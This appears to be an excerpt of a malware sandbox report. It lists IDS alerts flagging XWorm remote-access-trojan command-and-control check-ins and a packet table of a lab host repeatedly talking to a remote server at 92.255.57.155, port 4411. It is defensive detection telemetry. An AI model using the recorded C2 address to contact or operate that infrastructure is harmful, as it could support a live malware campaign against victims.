2024-12-29T09:50:45.944505+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:45.946339+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:46.242158+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:46.243164+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:46.859638+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:47.070658+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:47.192304+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:47.322907+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:47.401350+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:47.401428+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:47.488304+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:47.533207+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:48.162862+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:48.163875+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:48.793146+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:48.840868+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:49.003677+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:49.004491+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:49.123194+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:49.124073+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:49.337934+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:49.453859+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:49.576067+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:50.636899+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:50.892561+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:51.362069+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:51.509171+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:51.648618+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:51.983669+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:51.988006+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:52.619465+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:52.796384+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:53.125986+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:53.700978+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:53.731329+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:54.777634+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:54.820056+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:55.030677+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:55.058821+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:55.269249+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:55.275245+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:55.522807+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:55.527332+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:55.605116+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:55.700544+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:55.902793+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:55.903636+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:56.714702+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:56.741940+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:56.925186+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:56.925894+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:57.072634+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:57.178951+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:57.235446+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:57.255964+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:57.298726+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:58.683506+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:58.684333+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:59.355347+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:59.996072+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:59.996115+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:00.101454+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:00.433841+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:00.435977+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:00.730443+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:00.731439+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:01.052735+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:01.053669+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:01.222593+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:01.223506+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:01.383482+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:01.462274+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:01.851191+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:01.852300+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:02.142201+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:02.465885+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:02.466846+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:02.630456+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:02.644798+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:02.905722+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:03.038662+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:03.665531+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:03.666431+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:03.875638+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:03.876501+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:03.996284+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:04.159384+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:04.504595+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:04.715168+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:04.796051+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:04.796099+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:04.868680+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:04.925368+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.125989+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.147864+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:05.182844+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.271370+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:05.336382+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.451332+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:05.572643+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.575348+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:05.781289+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:05.905298+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:06.024480+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:51:06.270171+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:06.480651+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:06.693300+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:29.367466+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:38.955890+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 29, 2024 09:49:01.853091955 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:01.972662926 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:01.972875118 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:02.054852962 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:02.174489021 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:16.109200001 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:16.228585005 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:16.560934067 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:16.606524944 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:16.610127926 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:16.729516983 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:29.301964045 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:29.356365919 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:30.013010025 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:30.132520914 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:30.464962959 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:30.466737032 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:30.586071014 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:43.950570107 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:44.069933891 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:44.402293921 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:44.404637098 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:44.524219036 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:57.898149014 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:58.072128057 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:58.404895067 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:58.406884909 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:49:58.526071072 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:59.328119040 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:49:59.372204065 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:02.575685978 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:02.695075035 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:03.029819012 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:03.047503948 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:03.166938066 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:03.513036966 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:03.632328033 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:03.632395029 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:03.751770973 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:03.841217995 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:03.961577892 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:03.961653948 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:03.964581966 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.012655973 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:04.124773979 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.125300884 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:04.172070980 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.215887070 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:04.244601965 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.245199919 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:04.292081118 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.340787888 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:04.364660025 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.364799976 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:04.455341101 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.484100103 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.484146118 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:04.603450060 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.665749073 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.667285919 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:04.786613941 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.786670923 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:04.814162970 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:04.856417894 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:04.948699951 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
